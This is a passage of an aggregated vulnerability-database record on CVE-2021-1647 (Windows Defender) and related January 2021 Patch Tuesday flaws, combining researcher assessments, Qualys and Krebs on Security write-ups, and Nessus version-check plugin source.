<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1647>\n\n \n**Recent assessments:** \n \n**cdelafuente-r7** at January 13, 2021 3:55pm UTC reported:\n\nNo useful information has been published so far and most of the speculations found online are based on the [CVSS 3.0](<https://www.first.org/cvss/v3-0/>) metrics found in the [advisory](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1647>). That said, the attack vector seems to be [Local](<https://www.first.org/cvss/v3.0/specification-document#2-1-1-Attack-Vector-AV>) but can be exploited remotely, which means that some kind of malicious file needs to be placed locally to be scanned by Windows Defender and trigger the vulnerability. After talking about this with **@smcintyre-r7** and **@bwatters-r7**, we can imagine that `Remote` means this file needs to be sent remotely somehow, for example, using a file upload in a website or an email attachment via Exchange.\n\nSome considerations to keep in mind: Windows defender vulnerabilities get patched immediately and automatically, without user interactions. So, the exploitation window is very short. Finally, even if the exploitation succeeds, the evasion will be problematic, since the anti-virus will probably detect the attack.\n\nAssessed Attacker Value: 2 \nAssessed Attacker Value: 1**gwillcox-r7** at February 04, 2021 7:15pm UTC reported:\n\nNo useful information has been published so far and most of the speculations found online are based on the [CVSS 3.0](<https://www.first.org/cvss/v3-0/>) metrics found in the [advisory](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1647>). That said, the attack vector seems to be [Local](<https://www.first.org/cvss/v3.0/specification-document#2-1-1-Attack-Vector-AV>) but can be exploited remotely, which means that some kind of malicious file needs to be placed locally to be scanned by Windows Defender and trigger the vulnerability. After talking about this with **@smcintyre-r7** and **@bwatters-r7**, we can imagine that `Remote` means this file needs to be sent remotely somehow, for example, using a file upload in a website or an email attachment via Exchange.\n\nSome considerations to keep in mind: Windows defender vulnerabilities get patched immediately and automatically, without user interactions. So, the exploitation window is very short. Finally, even if the exploitation succeeds, the evasion will be problematic, since the anti-virus will probably detect the attack.\n", "modified": "2021-01-16T00:00:00", "published": "2021-01-12T00:00:00", "id": "AKB:06000FAE-591B-46C7-8573-3D63BDDD0D13", "href": "https://attackerkb.com/topics/DzXZpEuBeP/cve-2021-1647-microsoft-windows-defender-zero-day-vulnerability", "type": "attackerkb", "title": "CVE-2021-1647 Microsoft Windows Defender Zero-Day Vulnerability", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-14T21:07:38", "bulletinFamily": "info", "cvelist": ["CVE-2020-0986", "CVE-2020-1237", "CVE-2020-1246", "CVE-2020-1262", "CVE-2020-1264", "CVE-2020-1266", "CVE-2020-1269", "CVE-2020-1273", "CVE-2020-1274", "CVE-2020-1275", "CVE-2020-1276", "CVE-2020-1307", "CVE-2020-1316", "CVE-2020-17008", "CVE-2021-1648"], "description": "An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory, aka \u2018Windows Kernel Elevation of Privilege Vulnerability\u2019. This CVE ID is unique from CVE-2020-1237, CVE-2020-1246, CVE-2020-1262, CVE-2020-1264, CVE-2020-1266, CVE-2020-1269, CVE-2020-1273, CVE-2020-1274, CVE-2020-1275, CVE-2020-1276, CVE-2020-1307, CVE-2020-1316.\n\n \n**Recent assessments:** \n \n**ccondon-r7** at December 28, 2020 5:15pm UTC reported:\n\nGoogle Project Zero researcher Maddie Stone, who originally [disclosed this vulnerability](<https://bugs.chromium.org/p/project-zero/issues/detail?id=2096>) to Microsoft, [reported on December 23, 2020](<https://twitter.com/maddiestone/status/1341781305126612995>) that the patch is incomplete and can be bypassed.\n\nQuoting her [post here](<https://twitter.com/maddiestone/status/1341781306766573568>): \u201cThe original issue was an arbitrary pointer dereference which allowed the attacker to control the src and dest pointers to a memcpy. The \u201cfix\u201d simply changed the pointers to offsets, which still allows control of the args to the memcpy.\u201d\n\nStealing directly from a conversation with Metasploit\u2019s Windows exploit expert **@zeroSteiner**, it sounds like this bug isn\u2019t terribly useful as an LPE \u201cbecause the slpwow64 process doesn\u2019t run with elevated privileges\u2014just an elevated integrity, which Microsoft doesn\u2019t consider a security boundary anymore anyway.\u201d Project Zero-reported vulns tend to draw media and researcher attention and there\u2019s quite a lot of detail publicly available between Stone\u2019s original report and this in-depth [Kaspersky write-up](<https://securelist.com/operation-powerfall-cve-2020-0986-and-variants/98329/>), so we may see more exploitation even if the impact of the bug by itself isn\u2019t terribly high. That said, the Kaspersky analysis is definitely worth a read if you want to understand this CVE\u2019s utility for the IE 11 use case!\n\nAssessed Attacker Value: 2 \nAssessed Attacker Value: 4**gwillcox-r7** at November 22, 2020 2:32am UTC reported:\n\nGoogle Project Zero researcher Maddie Stone, who originally [disclosed this vulnerability](<https://bugs.chromium.org/p/project-zero/issues/detail?id=2096>) to Microsoft, [reported on December 23, 2020](<https://twitter.com/maddiestone/status/1341781305126612995>) that the patch is incomplete and can be bypassed.\n\nQuoting her [post here](<https://twitter.com/maddiestone/status/1341781306766573568>): \u201cThe original issue was an arbitrary pointer dereference which allowed the attacker to control the src and dest pointers to a memcpy. The \u201cfix\u201d simply changed the pointers to offsets, which still allows control of the args to the memcpy.\u201d\n\nStealing directly from a conversation with Metasploit\u2019s Windows exploit expert **@zeroSteiner**, it sounds like this bug isn\u2019t terribly useful as an LPE \u201cbecause the slpwow64 process doesn\u2019t run with elevated privileges\u2014just an elevated integrity, which Microsoft doesn\u2019t consider a security boundary anymore anyway.\u201d Project Zero-reported vulns tend to draw media and researcher attention and there\u2019s quite a lot of detail publicly available between Stone\u2019s original report and this in-depth [Kaspersky write-up](<https://securelist.com/operation-powerfall-cve-2020-0986-and-variants/98329/>), so we may see more exploitation even if the impact of the bug by itself isn\u2019t terribly high. That said, the Kaspersky analysis is definitely worth a read if you want to understand this CVE\u2019s utility for the IE 11 use case!\n", "modified": "2020-07-24T00:00:00", "published": "2020-06-09T00:00:00", "id": "AKB:0E829C08-804A-436D-A730-1B474A82E4A7", "href": "https://attackerkb.com/topics/bQeeJLG1aP/cve-2020-0986", "type": "attackerkb", "title": "CVE-2020-0986", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "qualysblog": [{"lastseen": "2021-01-15T00:26:33", "bulletinFamily": "blog", "cvelist": ["CVE-2020-17087", "CVE-2021-1647", "CVE-2021-1648"], "description": "This month\u2019s Microsoft Patch Tuesday addresses 83 vulnerabilities. The 10 Critical vulnerabilities cover Windows codecs, Office, HEVC video extensions, RPC runtime, and several other workstation vulnerabilities. Adobe released patches today for Photoshop, Campaign Classic, InCopy, Illustrator, Captivate, Bridge and Animate.\n\n### Workstation Patches\n\nOffice and Edge vulnerabilities should be prioritized for workstation-type devices, meaning any system that is used to access email or to access the internet via a browser. This includes multi-user servers that are used as remote desktops for users.\n\n### Microsoft Defender RCE Zero Day\n\nMicrosoft patches Defender Remote Code Execution vulnerability ([CVE-2021-1647](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1647>)) in today&#x27;s patch release for Microsoft Malware Protection Engine. Microsoft stated that this vulnerability was exploited before the patches were made available. This patch should be prioritized.\n\n### splwow64 Elevation of Privilege\n\nWhile Microsoft labeled this issue ([CVE-2021-1648](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1648>)) as an elevation-of-privilege vulnerability, it can also be exploited to disclose information, specifically uninitialized memory. Microsoft stated the vulnerability has not been exploited in the wild, although details are available publicly.\n\n### Windows Kernel Local Elevation of Privilege\n\nMicrosoft updated [CVE-2020-17087](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-17087>) for Windows Server 2012 in today&#x27;s Patch Tuesday, and users are recommended to apply today&#x27;s patches for Windows Server 2012.\n\nWe appreciate Microsoft&#x27;s acknowledgement of our co-ordinated disclosure of the underlying regression in the Windows Server 2012 version of this security update.\n\n### Adobe\n\nAdobe issued patches today covering multiple vulnerabilities in [Adobe Photoshop](<https://helpx.adobe.com/security/products/photoshop/apsb21-01.html>), [Illustrator](<https://helpx.adobe.com/security/products/photoshop/apsb21-02.html>), [Animate](<https://helpx.adobe.com/security/products/photoshop/apsb21-03.html>), [Campaign](<https://helpx.adobe.com/security/products/photoshop/apsb21-04.html>), [InCopy,](<https://helpx.adobe.com/security/products/photoshop/apsb21-05.html>) [Captivate](<https://helpx.adobe.com/security/products/photoshop/apsb21-06.html>) and [Bridge](<https://helpx.adobe.com/security/products/photoshop/apsb21-07.html>). The patches for Adobe Campaign are labeled as [Priority 2](<https://helpx.adobe.com/security/severity-ratings.html>), while the remaining patches are set to [Priority 3](<https://helpx.adobe.com/security/severity-ratings.html>).\n\nWhile none of the vulnerabilities disclosed in Adobe\u2019s release are known to be actively attacked today, all patches should be prioritized on systems with these products installed.\n\n### About Patch Tuesday\n\nPatch Tuesday QIDs are published at [Security Alerts](<https://www.qualys.com/research/security-alerts/>), typically late in the evening of [Patch Tuesday](<https://blog.qualys.com/tag/patch-tuesday>), followed shortly after by [PT dashboards](<https://qualys-secure.force.com/discussions/s/article/000006505>).", "modified": "2021-01-12T20:01:43", "published": "2021-01-12T20:01:43", "id": "QUALYSBLOG:84DFCF34CC23A9FDDFBD73DEF70C8C04", "href": "https://blog.qualys.com/category/vulnerabilities-research", "type": "qualysblog", "title": "January 2021 Patch Tuesday \u2013 83 Vulnerabilities, 10 Critical, One Zero Day, Adobe", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "krebs": [{"lastseen": "2021-01-13T02:27:43", "bulletinFamily": "blog", "cvelist": ["CVE-2018-8514", "CVE-2019-1409", "CVE-2019-1458", "CVE-2020-1660", "CVE-2021-1647", "CVE-2021-1648", "CVE-2021-1660", "CVE-2021-1709"], "description": "**Microsoft** today released updates to plug more than 80 security holes in its **Windows** operating systems and other software, including one that is actively being exploited and another which was disclosed prior to today. Ten of the flaws earned Microsoft&#x27;s most-dire &quot;critical&quot; rating, meaning they could be exploited by malware or miscreants to seize remote control over unpatched systems with little or no interaction from Windows users.\n\n\n\nMost concerning of this month&#x27;s batch is probably a critical bug ([CVE-2021-1647](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1647>)) in Microsoft&#x27;s default anti-malware suite -- **Windows Defender** -- that is seeing active exploitation. Microsoft recently stopped providing a great deal of detail in their vulnerability advisories, so it&#x27;s not entirely clear how this is being exploited.\n\nBut **Kevin Breen**, director of research at **Immersive Labs**, says depending on the vector the flaw could be trivial to exploit.\n\n&quot;It could be as simple as sending a file,&quot; he said. &quot;The user doesn&#x27;t need to interact with anything, as Defender will access it as soon as it is placed on the system.&quot;\n\nFortunately, this bug is probably already patched by Microsoft on end-user systems, as the company continuously updates Defender outside of the normal monthly patch cycle.\n\nBreen called attention to another critical vulnerability this month -- [CVE-2020-1660](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1660>) -- which is a remote code execution flaw in nearly every version of Windows that earned a [CVSS score](<https://www.first.org/cvss/>) of 8.8 (10 is the most dangerous).\n\n&quot;They classify this vulnerability as &#x27;low&#x27; in complexity, meaning an attack could be easy to reproduce,&quot; Breen said. &quot;However, they also note that it\u2019s &#x27;less likely&#x27; to be exploited, which seems counterintuitive. Without full context of this vulnerability, we have to rely on Microsoft to make the decision for us.&quot;\n\nCVE-2020-1660 is actually just one of five bugs in a core Microsoft service called **Remote Procedure Call** (RPC), which is responsible for a lot of heavy lifting in Windows. Some of the more memorable computer worms of the last decade spread automatically by exploiting RPC vulnerabilities.\n\n**Allan Liska**, senior security architect at **Recorded Future**, said while it is concerning that so many vulnerabilities around the same component were released simultaneously, two previous vulnerabilities in RPC -- [CVE-2019-1409](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2019-1409>) and [CVE-2018-8514](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2018-8514>) -- were not widely exploited.\n\nThe remaining 70 or so flaws patched this month earned Microsoft&#x27;s less-dire &quot;important&quot; ratings, which is not to say they&#x27;re much less of a security concern. Case in point: [CVE-2021-1709](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1709>), which is an &quot;elevation of privilege&quot; flaw in Windows 8 through 10 and Windows Server 2008 through 2019.\n\n&quot;Unfortunately, this type of vulnerability is often quickly exploited by attackers,&quot; Liska said. &quot;For example, [CVE-2019-1458](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2019-1458>) was announced on December 10th of 2019, and by December 19th an attacker was seen selling an exploit for the vulnerability on underground markets. So, while CVE-2021-1709 is only rated as [an information exposure flaw] by Microsoft it should be prioritized for patching.&quot;\n\n**Trend Micro&#x27;s ZDI Initiative** pointed out another flaw marked &quot;important&quot; -- [CVE-2021-1648](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1648>), an elevation of privilege bug in Windows 8, 10 and some Windows Server 2012 and 2019 that was publicly disclosed by ZDI prior to today.\n\n&quot;It was also discovered by Google likely because this patch corrects a bug introduced by a previous patch,&quot; ZDI&#x27;s **Dustin Childs** said. &quot;The previous CVE was being exploited in the wild, so it\u2019s within reason to think this CVE will be actively exploited as well.\u201d\n\nSeparately, Adobe released security updates to tackle at least eight vulnerabilities [across a range of products](<https://blogs.adobe.com/psirt/?p=1960>), including **Adobe Photoshop** and **Illustrator**. There are no **Flash Player** updates because Adobe retired the browser plugin in December (hallelujah!), and Microsoft&#x27;s update cycle from last month removed the program from Microsoft&#x27;s browsers.\n\nWindows 10 users should be aware that the operating system will download updates and install them all at once on its own schedule, closing out active programs and rebooting the system. If you wish to ensure Windows has been set to pause updating so you have ample opportunity to back up your files and/or system, see [this guide](<https://www.computerworld.com/article/3543189/check-to-make-sure-you-have-windows-updates-paused.html>).\n\nPlease back up your system before applying any of these updates. Windows 10 even has [some built-in tools](<https://lifehacker.com/how-to-back-up-your-computer-automatically-with-windows-1762867473>) to help you do that, either on a per-file/folder basis or by making a complete and bootable copy of your hard drive all at once. You never know when a patch roll-up will bork your system or possibly damage important files. For those seeking more flexible and full-featured backup options (including incremental backups), [Acronis](<https://www.acronis.com/en-us/products/true-image/>) and [Macrium](<https://www.macrium.com/>) are two that I&#x27;ve used previously and are worth a look.\n\nThat said, there don&#x27;t appear to be any major issues cropping up yet with this month&#x27;s update batch. But before you apply updates consider paying a visit to [AskWoody.com](<https://www.askwoody.com/category/microsoft-windows-patches-security/>), which usually has the skinny on any reports about problematic patches.\n\nAs always, if you experience glitches or issues installing any of these patches this month, please consider leaving a comment about it below; there\u2019s a better-than-even chance other readers have experienced the same and may chime in here with some helpful tips.", "modified": "2021-01-13T01:32:20", "published": "2021-01-13T01:32:20", "id": "KREBS:B3F20C0C41C613971FDADBAE93382CDF", "href": "https://krebsonsecurity.com/2021/01/microsoft-patch-tuesday-january-2021-edition/", "type": "krebs", "title": "Microsoft Patch Tuesday, January 2021 Edition", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-01-20T14:27:15", "description": "The Malware Protection Engine version of Forefront Endpoint Protection installed on the remote Windows host\nis prior to 1.1.17600.5. It is, therefore, affected by an unspecified remote code execution vulnerability. An\nauthenticated, local attacker can exploit this to bypass authentication and execute arbitrary code with administrator privileges.", "edition": 4, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-01-12T00:00:00", "title": "Security Update for Forefront Endpoint Protection (January 2021)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2021-1647"], "modified": "2021-01-12T00:00:00", "cpe": ["cpe:/a:microsoft:system_center_endpoint_protection"], "id": "SMB_NT_MS21_JAN_FEP.NASL", "href": "https://www.tenable.com/plugins/nessus/144886", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(144886);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2021-1647\");\n\n script_name(english:\"Security Update for Forefront Endpoint Protection (January 2021)\");\n script_summary(english:\"Checks the Malware Engine version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An antimalware application installed on the remote host is affected by\na remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Malware Protection Engine version of Forefront Endpoint Protection installed on the remote Windows host\nis prior to 1.1.17600.5. It is, therefore, affected by an unspecified remote code execution vulnerability. An\nauthenticated, local attacker can exploit this to bypass authentication and execute arbitrary code with administrator privileges.\");\n # https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1647\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?66e83fa0\");\n script_set_attribute(attribute:\"solution\", value:\n\"Enable automatic updates to update the malware engine for the relevant antimalware applications. Refer to Knowledge Base\nArticle 2510781 for information on how to verify that MMPE has been updated.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-1647\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/01/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/01/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/01/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:system_center_endpoint_protection\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"fep_installed.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\n\napp = 'Forefront Endpoint Protection';\n\napp_info = vcf::get_app_info(app:app, win_local:TRUE);\n\n# Check if we got tyhe Malware Engine Version\nif (isnull(app_info['engine_version']))\n exit(0,'Unable to get the Malware Engine Version.');\n\nconstraints = [{'max_version': '1.1.17600.5', 'fixed_version':'1.1.17700.4'}];\n\nvcf::av_checks::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE, check:'engine_version');\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-20T14:27:16", "description": "The Malware Protection Engine version of Microsoft Windows Defender installed on the remote Windows host\nis prior to 1.1.17600.5. It is, therefore, affected by an unspecified remote code execution vulnerability. An\nauthenticated, local attacker can exploit this to bypass authentication and execute arbitrary code with administrator privileges.", "edition": 4, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-01-12T00:00:00", "title": "Security Update for Windows Defender (January 2021)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2021-1647"], "modified": "2021-01-12T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:windows_defender"], "id": "SMB_NT_MS21_JAN_WIN_DEFENDER.NASL", "href": "https://www.tenable.com/plugins/nessus/144876", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(144876);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2021-1647\");\n\n script_name(english:\"Security Update for Windows Defender (January 2021)\");\n script_summary(english:\"Checks the Malware Engine version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An antimalware application installed on the remote host is affected by\na remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Malware Protection Engine version of Microsoft Windows Defender installed on the remote Windows host\nis prior to 1.1.17600.5. It is, therefore, affected by an unspecified remote code execution vulnerability. An\nauthenticated, local attacker can exploit this to bypass authentication and execute arbitrary code with administrator privileges.\");\n # https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1647\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?66e83fa0\");\n script_set_attribute(attribute:\"solution\", value:\n\"Enable automatic updates to update the malware engine for the relevant antimalware applications. Refer to Knowledge Base\nArticle 2510781 for information on how to verify that MMPE has been updated.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-1647\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/01/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/01/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/01/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:windows_defender\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"microsoft_windows_defender_win_installed.nbin\");\n script_require_keys(\"SMB/Registry/Enumerated\", \"SMB/svcs\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\n\napp = 'Windows Defender';\n\napp_info = vcf::get_app_info(app:app, win_local:TRUE);\n\n# Check if disabled\nif (!isnull(app_info['Disabled']))\n exit(0,'Windows Defender is disabled.');\n\n# Check if we got tyhe Malware Engine Version\nif (isnull(app_info['Engine Version']))\n exit(0,'Unable to get the Malware Engine Version.');\n\nconstraints = [{'max_version': '1.1.17600.5', 'fixed_version':'1.1.17700.4'}];\n\nvcf::av_checks::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE, check:'Engine Version');\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-03-02T14:45:44", "description": "The remote Windows host is missing security update 4598297\nor cumulative update 4598278. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2020-17087, CVE-2021-1648, CVE-2021-1649, \n CVE-2021-1650, CVE-2021-1652, CVE-2021-1653, \n CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, \n CVE-2021-1661, CVE-2021-1688, CVE-2021-1693, \n CVE-2021-1694, CVE-2021-1695, CVE-2021-1702, \n CVE-2021-1704, CVE-2021-1706, CVE-2021-1709)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-1679)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application. (CVE-2021-1674,\n CVE-2021-1678)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-1656, CVE-2021-1676,\n CVE-2021-1696, CVE-2021-1699, CVE-2021-1708)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-1657,\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664,\n CVE-2021-1665, CVE-2021-1666, CVE-2021-1667,\n CVE-2021-1668, CVE-2021-1671, CVE-2021-1673,\n CVE-2021-1700, CVE-2021-1701, CVE-2021-1710)", "edition": 7, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2021-01-12T00:00:00", "title": "KB4598297: Windows Server 2012 January 2021 Security Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2021-1667", "CVE-2021-1676", "CVE-2021-1679", "CVE-2021-1700", "CVE-2021-1710", "CVE-2020-17087", "CVE-2021-1666", "CVE-2021-1664", "CVE-2021-1702", "CVE-2021-1693", "CVE-2021-1673", "CVE-2021-1701", "CVE-2021-1688", "CVE-2021-1650", "CVE-2021-1699", "CVE-2021-1656", "CVE-2021-1704", "CVE-2021-1655", "CVE-2021-1653", "CVE-2021-1695", "CVE-2021-1648", "CVE-2021-1654", "CVE-2021-1678", "CVE-2021-1668", "CVE-2021-1694", "CVE-2021-1661", "CVE-2021-1649", "CVE-2021-1708", "CVE-2021-1659", "CVE-2021-1709", "CVE-2021-1652", "CVE-2021-1658", "CVE-2021-1671", "CVE-2021-1660", "CVE-2021-1706", "CVE-2021-1696", "CVE-2021-1665", "CVE-2021-1674", "CVE-2021-1657"], "modified": "2021-01-12T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_JAN_4598278.NASL", "href": "https://www.tenable.com/plugins/nessus/144881", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(144881);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/03/01\");\n\n script_cve_id(\n \"CVE-2020-17087\",\n \"CVE-2021-1648\",\n \"CVE-2021-1649\",\n \"CVE-2021-1650\",\n \"CVE-2021-1652\",\n \"CVE-2021-1653\",\n \"CVE-2021-1654\",\n \"CVE-2021-1655\",\n \"CVE-2021-1656\",\n \"CVE-2021-1657\",\n \"CVE-2021-1658\",\n \"CVE-2021-1659\",\n \"CVE-2021-1660\",\n \"CVE-2021-1661\",\n \"CVE-2021-1664\",\n \"CVE-2021-1665\",\n \"CVE-2021-1666\",\n \"CVE-2021-1667\",\n \"CVE-2021-1668\",\n \"CVE-2021-1671\",\n \"CVE-2021-1673\",\n \"CVE-2021-1674\",\n \"CVE-2021-1676\",\n \"CVE-2021-1678\",\n \"CVE-2021-1679\",\n \"CVE-2021-1688\",\n \"CVE-2021-1693\",\n \"CVE-2021-1694\",\n \"CVE-2021-1695\",\n \"CVE-2021-1696\",\n \"CVE-2021-1699\",\n \"CVE-2021-1700\",\n \"CVE-2021-1701\",\n \"CVE-2021-1702\",\n \"CVE-2021-1704\",\n \"CVE-2021-1706\",\n \"CVE-2021-1708\",\n \"CVE-2021-1709\",\n \"CVE-2021-1710\"\n );\n script_xref(name:\"MSKB\", value:\"4598278\");\n script_xref(name:\"MSKB\", value:\"4598297\");\n script_xref(name:\"MSFT\", value:\"MS21-4598278\");\n script_xref(name:\"MSFT\", value:\"MS21-4598297\");\n script_xref(name:\"IAVA\", value:\"2021-A-0023\");\n\n script_name(english:\"KB4598297: Windows Server 2012 January 2021 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4598297\nor cumulative update 4598278. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2020-17087, CVE-2021-1648, CVE-2021-1649, \n CVE-2021-1650, CVE-2021-1652, CVE-2021-1653, \n CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, \n CVE-2021-1661, CVE-2021-1688, CVE-2021-1693, \n CVE-2021-1694, CVE-2021-1695, CVE-2021-1702, \n CVE-2021-1704, CVE-2021-1706, CVE-2021-1709)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-1679)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application. (CVE-2021-1674,\n CVE-2021-1678)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-1656, CVE-2021-1676,\n CVE-2021-1696, CVE-2021-1699, CVE-2021-1708)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-1657,\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664,\n CVE-2021-1665, CVE-2021-1666, CVE-2021-1667,\n CVE-2021-1668, CVE-2021-1671, CVE-2021-1673,\n CVE-2021-1700, CVE-2021-1701, CVE-2021-1710)\");\n # https://support.microsoft.com/en-us/help/4598278/windows-server-2012-update\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?bbb76f59\");\n # https://support.microsoft.com/en-us/help/4598297/windows-server-2012-update\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b71d9485\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4598297 or Cumulative Update 